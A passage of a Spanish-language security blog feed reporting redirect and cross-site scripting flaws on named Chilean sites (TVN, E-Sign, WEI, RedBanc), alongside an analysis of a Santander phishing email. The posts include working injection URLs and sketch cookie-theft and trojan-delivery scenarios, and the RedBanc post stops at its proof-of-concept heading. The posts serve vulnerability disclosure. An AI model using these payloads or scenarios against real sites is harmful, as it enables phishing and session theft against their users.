			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-xss-en-sitio-web-de-pcfactory%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/cross-site-scripting-xss-en-sitio-web-de-pcfactory/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/cross-site-scripting-xss-en-sitio-web-de-pcfactory/"  data-text="Cross-Site Scripting (XSS) en sitio web de PCFactory" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/cross-site-scripting-xss-en-sitio-web-de-pcfactory/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>TVN permite, desde su sitio web del mundial, redireccionar a un sitio maligno</title>
		<link>http://blog.zerial.org/seguridad/tvn-permite-desde-su-sitio-web-del-mundial-redireccionar-a-un-sitio-maligno/</link>
		<comments>http://blog.zerial.org/seguridad/tvn-permite-desde-su-sitio-web-del-mundial-redireccionar-a-un-sitio-maligno/#comments</comments>
		<pubDate>Tue, 29 Jun 2010 14:22:08 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[chile]]></category>
		<category><![CDATA[mundial]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[sitio maligno]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[tvn]]></category>
		<category><![CDATA[url malignas]]></category>
		<category><![CDATA[url vulnerables]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1777</guid>
		<description><![CDATA[El sitio web que TVN destinó a las transmisiones del mundial, http://tvndeportes.cl, permite que cualquier persona pueda redireccionar a algun usuario a un sitio maligno. La URL vulnerable es http://tvndeportes.cl/intersitial/index.html?link=, a &#8220;link&#8221; podemos asignarle cualquier URL y el navegador será redireccionado a esa URL. Por ejemplo: http://tvndeportes.cl/intersitial/index.html?link=http://sitio.webmaligno.com/pics/pics.exe Quizá este método solo nos permita redireccionar a [...]]]></description>
			<content:encoded><![CDATA[<p>El sitio web que TVN destinó a las transmisiones del mundial, <a href="http://tvndeportes.cl" target="_blank">http://tvndeportes.cl</a>, permite que cualquier persona pueda redireccionar a algun usuario a un sitio maligno.</p>
<p>La URL vulnerable es <strong>http://tvndeportes.cl/intersitial/index.html?link=</strong>, a &#8220;link&#8221; podemos asignarle cualquier URL y el navegador será redireccionado a esa URL. Por ejemplo:</p>
<blockquote><p>http://tvndeportes.cl/intersitial/index.html?link=http://sitio.webmaligno.com/pics/pics.exe</p></blockquote>
<p>Quizá este método solo nos permita redireccionar a un usuario y nada mas, pero con un poco de imaginación y trabajo, perfectamente ese usuario podría ser engañado por email para ingresar a un sitio <strong>confiable</strong> de TVN y redirigirlo a un sitio de streaming falso, donde le haga aceptar la descarga de un archivo (troyano) para que pueda ver el video. Aprovechandose de todo esto del mundial, la locura por ver los partidos en alta definicion, perfectamente un atacante podría insitar a un usuario a descargar un programa para poder ver el partido, desde el sitio de tvn, en alta definición y gratis, obviamente &#8220;ese&#8221; programa sería un virus o algo similar.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Ftvn-permite-desde-su-sitio-web-del-mundial-redireccionar-a-un-sitio-maligno%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/tvn-permite-desde-su-sitio-web-del-mundial-redireccionar-a-un-sitio-maligno/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/tvn-permite-desde-su-sitio-web-del-mundial-redireccionar-a-un-sitio-maligno/"  data-text="TVN permite, desde su sitio web del mundial, redireccionar a un sitio maligno" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/tvn-permite-desde-su-sitio-web-del-mundial-redireccionar-a-un-sitio-maligno/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>E-Sign soluciona problema de seguridad (XSS) en su sitio web</title>
		<link>http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/</link>
		<comments>http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/#comments</comments>
		<pubDate>Mon, 03 May 2010 22:41:58 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[chile]]></category>
		<category><![CDATA[e-sign]]></category>
		<category><![CDATA[empresas]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[respuestas]]></category>
		<category><![CDATA[verisign]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1741</guid>
		<description><![CDATA[Tras el post anterior, la empresa afectada se ha comunicado conmigo vía correo electrónico agradeciendo y comunicando que solucionarán el problema lo antes posible Estimado Fernando: Me dirijo a usted como representante de la Empresa E-Sign, en mi calidad de Gerente de Operaciones,  para comentarle algunos de los alcances que ha tenido para nosotros el  [...]]]></description>
			<content:encoded><![CDATA[<p>Tras el <a href="http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/">post anterior</a>, la empresa afectada se ha comunicado conmigo vía correo electrónico agradeciendo y comunicando que solucionarán el problema lo antes posible</p>
<blockquote><p>Estimado Fernando:</p>
<p>Me dirijo a usted como representante de la Empresa E-Sign, en mi calidad de Gerente de Operaciones,  para comentarle algunos de los alcances que ha tenido para nosotros el  reporte de vulnerabilidad XSS que usted ha publicado a fines de la semana pasada.  Con su información hemos verificado los errores reportados, y nuestros programadores se encuentran trabajando en la revisión y corrección de otros posibles problemas. Específicamente, aquellos relacionados con el “<em>contacto.php</em>” se corrigieron el 30 de Abril en la tarde.</p>
<p>Le agradecería que, en el caso de detectar una nueva vulnerabilidad o la posibilidad de ella en nuestro sitio, lo informe directamente a mi correo particular o telefónicamente a la empresa. Asimismo, le solicitamos que nos dé un  espacio de tiempo suficiente para corregir el problema, antes de publicarlo en internet.</p>
<p>Finalmente, a nombre de E-Sign, quisiéramos agradecerle su nota y enfatizar que tomaremos todas las medidas necesarias para evitar que este tipo de problemas vuelvan a ocurrir.</p></blockquote>
<p>Creo que es una buena respuesta y es la forma en que deberían actuar las empresas cuando se les informa sobre algún fallo, bug o vulnerabilidad que los afecta.<br />
Podemos ver que el enlace vulnerable: <a href="https://www.e-sign.cl/contacto.php?prefilla=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E">https://www.e-sign.cl/contacto.php?prefilla=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E</a> ya no se ve afectado.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fe-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/"  data-text="E-Sign soluciona problema de seguridad (XSS) en su sitio web" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Cross-Site Scripting en sitio VeriSign Chile (E-Sign)</title>
		<link>http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/</link>
		<comments>http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/#comments</comments>
		<pubDate>Thu, 29 Apr 2010 18:49:57 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[ssl]]></category>
		<category><![CDATA[verisign]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1715</guid>
		<description><![CDATA[E-Sign (cl) corresponde a los representantes y/o partners de VeriSign, una reconocida marca de seguridad informática a nivel mundial y como tal, ofrecen servicios de seguridad informatica, certificados de seguridad, auditorias, etc. La empresa E-Sign ofrece el servicio de Anti Phishing y Consultoría de Seguridad, entre otros. Sin embargo, el sitio web de dicha empresa [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esignverisign.png"><img class="size-full wp-image-1718 alignleft" style="margin-left: 1px; margin-right: 1px;" title="esignverisign" src="http://blog.zerial.org/wp-content/uploads/2010/04/esignverisign.png" alt="" width="172" height="44" /></a><a href="http://www.e-sign.cl">E-Sign (cl)</a> corresponde a los representantes y/o partners de <a href="http://www.verisign.com/">VeriSign</a>, una reconocida marca de seguridad informática a nivel mundial y como tal, ofrecen servicios de seguridad informatica, certificados de seguridad, auditorias, etc.<br />
La empresa E-Sign ofrece el servicio de <strong>Anti Phishing</strong> y Consultoría de Seguridad, entre otros. Sin embargo, el sitio web de dicha empresa es <strong>vulnerable</strong> a Cross-Site Scripting y mediante esto, podemos hacer phishing usando la &#8220;credibilidad&#8221; de su certificado SSL.</p>
<p>La idea de un sitio con certificado SSL es que toda la información viaje cifrada, pero la gente de E-Sign al parecer no piensan eso. Al menos dos formularios del sitio envían la información sin cifrar, entonces ¿Para qué usan el certificado SSL?</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form1.png"><img class="aligncenter size-full wp-image-1727" title="esign_form1" src="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form1.png" alt="" width="543" height="64" /></a></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form2.png"><img class="aligncenter size-full wp-image-1728" title="esign_form2" src="http://blog.zerial.org/wp-content/uploads/2010/04/esign_form2.png" alt="" width="519" height="55" /></a></p>
<p>Quizá no es tan crítico, ya que se trata del formulario de contacto y el buscador, pero ya que ellos <strong>obligan</strong> al usuario a confiar de ellos aun cuando los formularios no se envian de forma segura, nosotros aprovecharemos de generar otro tipo de trafico de manera insegura, por ejemplo insertando un formulario falso o un sitio externo mediante XSS.</p>
<p><span id="more-1715"></span></p>
<p>¿A qué me refiero con esto? Sencillo, cuando estás navegando en un sitio seguro y en él, existe información que viaja de manera no-segura (sin cifrar), el navegador nos alerta y nos pregunta si queremos continuar.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/esign_warning.png"><img class="aligncenter size-full wp-image-1731" title="esign_warning" src="http://blog.zerial.org/wp-content/uploads/2010/04/esign_warning.png" alt="" width="669" height="168" /></a></p>
<p>En cierta forma, E-Sign está obligando al usuario a confiar en ellos y para proceder, el usuario tendrá que poner aceptar. Si ellos lo hacen, ¿por qué nosotros no?</p>
<p>Nos aprovechamos de una vulnerabilidad XSS que presentan algunos links, por ejemplo link de &#8220;Contacto&#8221;:</p>
<p><a href="https://www.e-sign.cl/contacto.php?prefilla=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E" target="_blank">https://www.e-sign.cl/contacto.php?prefilla=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E</a></p>
<p>Mediante XSS podriamos perfectamente modificar el formulario, agregar y quitar campos y redireccionar la informción hacia otro sitio o bien colocar un iframe externo que nos permita insertar un formulario arbitrario para capturar información que necesitamos.</p>
<p>Con un poco de ingenieria social y un poco del arte del engaño, seguramente podemos explotar aun mas esta vulnerabilidad. Muchas veces la vulnerabilidad va más alla de si misma, depende mucho del sitio sobre el cual se intenta explotar, en este caso, es mucho mas grave que en el caso del <a href="http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/">post anterior</a>.</p>
<p>Lo que encuentro más problematico, es que una empresa de seguridad, quienes ofrecen un servicio Anti Phishing, tengan este tipo de vulnerabilidades, le resta demasiada credibilidad a la empresa, lamentablemente las personas que contratan estos servicios generalmente no saben mucho del tema y creen que estaran en buenas manos y muchas veces estan cometiendo un error entregando su seguridad a las personas equivocadas.</p>
<p>Como de costumbre, intenté contactarme con los encargados mediante el formulario de contacto del sitio pero no he obtenido ningun tipo de respuesta.</p>
<p><strong>ACTUALIZACIóN &#8211; 3/Mayo/2010: </strong>La empresa se ha contactado conmigo via email. <a href="http://blog.zerial.org/seguridad/e-sign-soluciona-problema-de-seguridad-xss-en-su-sitio-web/">Más información acá</a>.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcross-site-scripting-en-sitio-verisign-chile-e-sign%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/"  data-text="Cross-Site Scripting en sitio VeriSign Chile (E-Sign)" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/cross-site-scripting-en-sitio-verisign-chile-e-sign/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>XSS en sitio web de WEI</title>
		<link>http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/</link>
		<comments>http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/#comments</comments>
		<pubDate>Wed, 28 Apr 2010 13:16:06 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[cookies]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1665</guid>
		<description><![CDATA[El sitio web de WEI (una tienda de productos informáticos) presenta una vulnerabilidad XSS en su buscador, ésto podría permitir el robo de identidad y acceso a información confidencial de sus clientes. La URL vulnerable es http://www.wei.cl/catalogue/product_search.htm?ph=&#38;query= Podemos inyectar código javascript en el valor de la variable &#8220;ph&#8221; y con esto insertar un frame o [...]]]></description>
			<content:encoded><![CDATA[<p>El sitio web de WEI (una tienda de productos informáticos) presenta una vulnerabilidad XSS en su buscador, ésto podría permitir el robo de identidad y acceso a información confidencial de sus clientes.</p>
<p>La URL vulnerable es</p>
<p><strong>http://www.wei.cl/catalogue/product_search.htm?ph=&amp;query=</strong></p>
<p>Podemos inyectar código javascript en el valor de la variable &#8220;ph&#8221; y con esto insertar un frame o algun elemento externo al sitio y hacelo parecer como si fuera del sitio usando la confianza que tienen los clientes, como por ejemplo un iframe o bien un javascript que nos envie la cookie de la sesion a otro sitio.</p>
<p><strong>Prueba de Concepto (PoC)</strong></p>
<p><a href="http://www.wei.cl/catalogue/product_search.htm?ph=%22%3E%3Cscript%3Ealert%28this%29%3C/script%3E&amp;query=+++++Buscar+++++"><strong>http://www.wei.cl/catalogue/product_search.htm?ph=%22%3E%3Cscript%3Ealert%28this%29%3C/script%3E&amp;query=+++++Buscar+++++</strong></a></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/wei1.png"><img class="aligncenter size-full wp-image-1690" title="wei1" src="http://blog.zerial.org/wp-content/uploads/2010/04/wei1.png" alt="" width="518" height="309" /></a><a href="http://www.wei.cl/catalogue/product_search.htm?ph=%22%3E%3Ciframe%20src=%22http://google.com%22%3E%3C/iframe%3E&amp;query=+++++Buscar+++++"><strong>http://www.wei.cl/catalogue/product_search.htm?ph=%22%3E%3Ciframe%20src=%22http://google.com%22%3E%3C/iframe%3E&amp;query=+++++Buscar+++++</strong></a></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/wei2.png"><img class="aligncenter size-full wp-image-1691" title="wei2" src="http://blog.zerial.org/wp-content/uploads/2010/04/wei2.png" alt="" width="458" height="412" /></a></p>
<p>En el sitio se pueden encontrar links de contacto y emails para escribir tipo info@wei.cl, ni los links ni los emails funcionan. Intenté reportar el problema pero el correo que envié al destinatario que en la misma página aparece, me rebotó.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fxss-en-sitio-web-de-wei%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/"  data-text="XSS en sitio web de WEI" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Phishing a Banco Santander</title>
		<link>http://blog.zerial.org/seguridad/phishing-a-banco-santander/</link>
		<comments>http://blog.zerial.org/seguridad/phishing-a-banco-santander/#comments</comments>
		<pubDate>Wed, 28 Apr 2010 00:34:42 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[banco]]></category>
		<category><![CDATA[banco santander]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[santander]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1670</guid>
		<description><![CDATA[A muchas personas, en su mayoría clientes del banco santander, les está llegando hace un tiempo correos con mensajes un tanto creibles y que, para una persona que no está bien preparada para enfrentar este tipo de engaños, podría transformarse en un problema. Los sitios de los bancos generalmente presentan inestabilidades que muchas veces ni [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/phishing.jpg"><img class="alignleft size-medium wp-image-1679" style="margin: 2px;" title="phishing" src="http://blog.zerial.org/wp-content/uploads/2010/04/phishing-300x200.jpg" alt="" width="139" height="90" /></a>A muchas personas, en su mayoría clientes del banco santander, les está llegando hace un tiempo correos con mensajes un tanto creibles y que, para una persona que no está bien preparada para enfrentar este tipo de engaños, podría transformarse en un problema. Los sitios de los bancos generalmente presentan inestabilidades que muchas veces ni las notamos, demora mas de la cuenta en cargar, aveces nos bota la sesion o simplemente el servicio no responde. Aludiendo a ésto, el mensaje de phishing nos envían empieza así:</p>
<blockquote><p>Es muy importante a leer.<br />
Puede ser que Usted haya notado que la                                       semana pasada nuestro sitio                                       www.gruposantander.cl  funcionaba inestable                                       y se observaban frecuentes intermitencias.<br />
Hemos renovado nuestras instalaciones                                       bancarias y ahora el problema está                                       resuelto.</p></blockquote>
<p><span id="more-1670"></span></p>
<p>Aunque hasta ahora el mensaje podría ser creible, <strong>no aparece el nombre del cliente</strong>, ésto le resta un punto de credibilidad inmediatamente. Luego viene la parte menos creible:</p>
<blockquote><p>Pero para una capacidad de trabajo                                       correcta de sus cuentas bancarias, le                                       pedimos a Usted introducir los detalles                                       completos de la cuenta para que pudamos                                       renovar nuestra base de los clientes y                                       comprobar nuestro sistema nuevo de                                       protección de los datos.</p></blockquote>
<p>Hay que tener en cuenta que una entidad bancaria <strong>jamás</strong> hará este tipo de peticiones vía email. Como pueden ver en el <a href="http://www.santander.cl/campanas/aviso_seguridad_b/index.asp">sitio web de santander</a>:</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/04/santander_seguridad.png"><img class="aligncenter size-full wp-image-1684" title="santander_seguridad" src="http://blog.zerial.org/wp-content/uploads/2010/04/santander_seguridad.png" alt="" width="420" height="364" /></a></p>
<p>La siguiente parte del mensaje dice:</p>
<blockquote><p>Tome este enlace <a href="http://vaisver.com/1000imagenes/"><strong>santander.cl</strong></a> para verificar sus datos bancarios.<br />
Esta carta es automaticamente mandada a                                       cada cliente del Banco Santander Central                                       Hispano, no hay necesidad a responder.</p>
<p>Con respeto,<br />
El servicio del mantenimiento técnico del                                       Banco.</p></blockquote>
<p>Esto es engañoso, ya que envían un texto azúly  subrayado, lo que a primera vista parece ser un link o enlace &#8220;normal&#8221; hacia &#8220;santander.cl&#8221;, pero si nos fijamos con más detalles, podemos ver que el link está apuntando a &#8220;<em>http://vaisver.com/1000imagenes/</em>&#8220;, lo que <strong>obviamente</strong> no corresponde a un sitio del Santander.</p>
<p>Si vamos al detalle tecnico del mensaje y revisamos los headers, podemos encontrar que el correo fue enviado desde la direcciòn IP <em>67.255.202.16</em> correspondiente al host <em>host.eemporio.com</em>, la direccion IP corresponde a Grecia. Al ingresar a http://host.eemporio.com podemos ver la página por defecto de CPanel, por lo que deducimos que se trata de un servidor de hosting que tiene el envio de emails habilitado, y alguna persona, de dentro o desde afuera, se está aprovechando de alguna falla o acceso para usar ese servidor como relay para éste tipo de actos.</p>
<p>Si buscamos en Google, podemos ver muchos resultados que hacen referencia a phishing en este banco: <a href="http://www.google.cl/search?q=phishing+banco+santander&amp;ie=utf-8&amp;oe=utf-8&amp;aq=t&amp;rls=org.mozilla:en-US:official&amp;client=firefox-a">http://www.google.cl/search?q=phishing+banco+santander&amp;ie=utf-8&amp;oe=utf-8&amp;aq=t&amp;rls=org.mozilla:en-US:official&amp;client=firefox-a</a></p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fphishing-a-banco-santander%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/phishing-a-banco-santander/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/phishing-a-banco-santander/"  data-text="Phishing a Banco Santander" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/phishing-a-banco-santander/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Grave vulnerabilidad del tipo Cross-Site Scripting en sitio web de RedBanc</title>
		<link>http://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/</link>
		<comments>http://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 14:22:10 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[redbanc]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[vulnerabilidad web]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1566</guid>
		<description><![CDATA[La semana pasada he descubierto una vulnerabilidad Cross-Site Scripting (XSS) en el sitio web de RedBanc. Redbanc S.A.. es una empresa que presta servicios de interconexión bancaria, es decir permite a los clientes de todos los bancos asociados realizar distintas operaciones, depósitos, transferencias, giros, etc. a través de una red cajeros automáticos, que son computadores [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2010/02/redbanc.png"><img src="http://blog.zerial.org/wp-content/uploads/2010/02/redbanc.png" alt="" title="redbanc" width="523" height="370" class="aligncenter size-full wp-image-1575" /></a></p>
<p>La semana pasada he descubierto una vulnerabilidad Cross-Site Scripting (XSS) en el sitio web de RedBanc.</p>
<blockquote><p>Redbanc S.A.. es una empresa que presta servicios de interconexión bancaria, es decir permite a los clientes de todos los bancos asociados realizar distintas operaciones, depósitos, transferencias, giros, etc.  a través de una red cajeros automáticos, que son computadores interconectados, permitiéndole al cliente realizar una serie de operaciones que antiguamente se debían realizar en una caja normal y con la restricción del horario. </p></blockquote>
<p>Está de más decir que con esta vulnerabilidad encontrada es posible realizar phishing, robos de identidad (robos de cookies mediante xss) y muchas otras cosas más relacionadas con estáfas usando la confianza el sitio RedBanc.cl.</p>
<p><span id="more-1566"></span></p>
<p>La vulnerabilidad se encuentra en la no-validación de los parametros de entrada en la URL <strong>http://www.redbanc.cl/portal_redbanc/browse?pagina=portal_redbanc/inicio.htm</strong>. Si modificamos la variable &#8220;pagina&#8221; y preparamos un javascript especialmente para el robo de cookies o bien algun sitio web externo que nos permita hacer phishing, basta con que coloquemos el código necesario y se lo asignemos a la variable.</p>
<h3>Explicación</h3>
<p>Cuando se cambia el valor de la variable <em>pagina</em> el sistema reportará que la página no existe. El mensaje de error tomará el valor que ingresamos en la variable y lo mostrará de la siguiente forma:<br />
- En el caso de <strong>http://www.redbanc.cl/portal_redbanc/browse?pagina=veamos/si/existe/la/pagina.htm</strong> podemos ver el mensaje de error </p>
<blockquote><p>Pagina no existe<br />
Pagina veamos/si/existe/la/pagina.htm no disponible</p></blockquote>
<p>Si nos damos cuenta, lo que dice justo debajo de &#8220;Pagina no existe&#8221; es justo lo que pusimos como valor de la variable <em>pagina</em> por lo que asumimos que cualqiuer cosa que pongamos en su lugar será mostrado y por ende si inyectamos un código html éste será mostrado e interpretado por nuestro navegador.</p>
<h3>PoC</h3>
<p>Inyectando un código javascript:<br />
